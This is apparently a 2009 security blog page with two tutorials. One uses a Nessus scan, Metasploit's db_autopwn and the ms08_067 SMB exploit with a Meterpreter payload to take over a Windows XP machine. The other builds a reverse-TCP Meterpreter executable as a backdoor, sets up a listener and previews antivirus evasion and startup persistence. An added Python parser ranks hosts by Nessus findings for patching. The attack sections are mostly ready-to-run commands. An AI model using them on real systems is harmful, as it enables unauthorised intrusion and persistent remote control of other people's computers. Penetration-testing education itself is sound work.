Nulbyte Security: Website committed to the security of our technological world.

Owning with Nessus and Metasploit
Posted by Nulbyte on 2009-03-29

<a href="http://www.youtube.com/watch?v=8TqMDzBiM9Q">&gt;&gt; View Full Size Video &lt;&lt;</a>

Today I'm going to show you how to use Nessus to create a vulnerability report that Metasploit can use to tell us what our target is vulnerable to. Nessus is not included in BackTrack 4, so you either have to go to <a href="http://nessus.org/">Nessus's website</a> or use apt-get. The apt-get command is:
<blockquote>apt-get install nessus nessusd</blockquote>
Now that you have Nessus installed, run "nessusd" in a terminal window. Nessusd is the server side of Nessus and holds all of the plugins. Nessusd will take quite a while to load, but once it's done, launch the Nessus client (found in the menu, or run "nessus" in a terminal).

NOTE: You may have to add a user. Use "nessus-adduser" for this.

Now that you have Nessus running, go to the "Nessusd host" tab, enter the username and password, and hit "Log in." This should connect the client to your nessusd server (connecting may take a while). Now go over to the "Target" tab and enter the IP address of your target. Click "Start the scan." After a while, another window will pop up with your results. Save them to a file for later (e.g. /root/nessus.nbe).

Now open a terminal window, go to your Metasploit Framework directory (mine is /pentest/exploits/framework3) and run ./msfconsole. This gives you the Metasploit prompt, where you can create a database to load the Nessus NBE file into:
<blockquote>db_create /root/database.db</blockquote>
This creates the database in the root folder and connects to it. Now run "db_import_nessus_nbe /root/nessus.nbe", which loads the Nessus scan results.

Now run:
<blockquote>db_autopwn -t -x</blockquote>
Metasploit will check the imported results to see which exploits match the machine. Now pick one of the exploits. I'm going to use "windows/smb/ms08_067" against a Windows XP SP2 machine:
<blockquote>use windows/smb/ms08_067</blockquote>
(change it to your exploit). Set the payload you want; I'm going to use Meterpreter:
<blockquote>set PAYLOAD windows/meterpreter/bind_tcp</blockquote>
Now set the IP address of your target in the RHOST variable:
<blockquote>set RHOST 192.168.1.113</blockquote>
Now you're ready to exploit!
<blockquote>exploit</blockquote>
If everything went well, you should now have a Meterpreter session! I've already filmed this tutorial and I'm doing a little post-production work on it; I should have it uploaded tonight.
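As an added example (not code from the original post or from Nessus/Metasploit), here is a small parser for the NBE report that the workflow above saves and imports, used to rank hosts by how many holes, warnings and notes Nessus reported so the worst-exposed machines get patched first. It assumes the pipe-delimited NBE line layout results|network|host|port|plugin_id|type|data with literal "\n" inside the data field, and the sample lines, plugin IDs and addresses are constructed.

```python
import re
from collections import defaultdict

# Constructed sample of a Nessus NBE report (not from the original post). Assumed
# layout: results|network|host|port|plugin_id|type|data, newlines in data as a literal "\n".
SAMPLE_NBE = r"""timestamps|||scan_start|Sun Mar 29 15:00:01 2009|
results|192.168.1|192.168.1.113|microsoft-ds (445/tcp)|11011|Security Note|An SMB server is running on this port.\n
results|192.168.1|192.168.1.113|microsoft-ds (445/tcp)|34476|Security Hole|Synopsis :\n\nArbitrary code can be executed on the remote host.\n
results|192.168.1|192.168.1.113|netbios-ns (137/udp)|10150|Security Warning|The remote host listens on UDP port 137.\n
results|192.168.1|192.168.1.120|http (80/tcp)|10107|Security Note|A web server is running on this port.\n
timestamps|||scan_end|Sun Mar 29 15:05:00 2009|
"""

SEVERITIES = ("Security Hole", "Security Warning", "Security Note")  # most severe first
PORT_RE = re.compile(r"\((\d+)/(tcp|udp)\)")


def parse_nbe(text):
    """Return one dict per 'results' line; timestamps and truncated lines are skipped."""
    findings = []
    for line in text.splitlines():
        if not line.startswith("results|"):
            continue
        parts = line.split("|", 6)       # the data field may itself contain '|'
        if len(parts) < 7:
            continue                     # truncated line: ignore rather than misattribute
        _, network, host, port, plugin_id, kind, data = parts
        m = PORT_RE.search(port)         # e.g. "microsoft-ds (445/tcp)"
        findings.append({
            "host": host, "service": port,
            "port": int(m.group(1)) if m else None,
            "proto": m.group(2) if m else None,
            "plugin_id": int(plugin_id), "severity": kind,
            "description": data.replace("\\n", "\n").strip(),
        })
    return findings


def summarize(findings):
    """Per-host counts by severity, e.g. {'192.168.1.113': {'Security Hole': 1, ...}}."""
    summary = defaultdict(lambda: {s: 0 for s in SEVERITIES})
    for f in findings:
        if f["severity"] in SEVERITIES:
            summary[f["host"]][f["severity"]] += 1
    return dict(summary)


def hosts_by_risk(findings):
    """Hosts ordered by (holes, warnings, notes), most exposed first, for patch triage."""
    summary = summarize(findings)
    return sorted(summary, key=lambda h: tuple(summary[h][s] for s in SEVERITIES), reverse=True)
```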
Again, if you need to contact me, you can reach me at nulbyte [-@-] gmail.com.

Meterpreter as a backdoor
Posted by Nulbyte on 2009-03-24

<a href="http://www.youtube.com/watch?v=BTfOzKACPsY">&gt;&gt; View Full Size Video &lt;&lt;</a>

After finding <a href="http://www.vimeo.com/1975301">THIS</a> video on using Meterpreter as a backdoor, I knew I had to make a post about it. I had been trying for a few days to get Meterpreter to work as a backdoor, and I hadn't had much luck. This video tutorial was the answer to my prayers.

Now, I had to watch the video a few times because it was a tad bit confusing (unless you pay close attention). I'm hoping this little walk-through will make it clearer and easier to understand.

Step 1: Issue the command:
<blockquote>./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.146 LPORT=5555 X > metexe.exe</blockquote>
(TIP: You must first be in your Metasploit Framework folder)

(Warning: metexe.exe will be detected by some antivirus products - tested with Antivir)

Let me explain what this all does. First of all, "./msfpayload" is the application we are going to run. "windows/meterpreter/reverse_tcp" is the payload we want built into a Windows binary. "LHOST=192.168.1.146" is a variable holding our (the attacker's) IP address. "LPORT=5555" is a variable telling the payload which port to connect back to. "X" (near the end of the command) instructs msfpayload to produce a Windows binary. Finally, "> metexe.exe" tells msfpayload where to save the file.

If you did everything correctly, you should now have a file named metexe.exe in the same directory that msfpayload is in (/pentest/exploits/framework3/, for example).

This is only half the battle, unfortunately. Sure, this will connect back to us, but we don't have anything running on our attacker machine to accept the incoming connection. Let's fix this little problem.

Step 2: Start ./msfconsole

Step 3: Type these commands:
<blockquote>use exploit/multi/handler<br />
set PAYLOAD windows/meterpreter/reverse_tcp<br />
set LHOST 192.168.1.146<br />
set LPORT 5555<br />
exploit</blockquote>
(TIP: Be sure to change 192.168.1.146 to your IP address)

You will notice that this won't actually exploit anything; it simply creates a listener to accept the Meterpreter connection. Try putting metexe.exe onto a Windows machine (I don't think it works on Vista yet) and launch it. If all goes smoothly, your listener should tell you that it just received a connection.

I'm planning on making three more posts related to Meterpreter in the near future: one on how antivirus products react to the compiled payload (metexe.exe), a second on how to actually use Meterpreter, and a third on how to get Meterpreter to run on startup using registry keys. Please note that the future posts are in no particular order and an ETA is not currently available.

Again, if you have any questions, comments, or concerns, please email me at nulbytesecurity [-@-] gmail.com.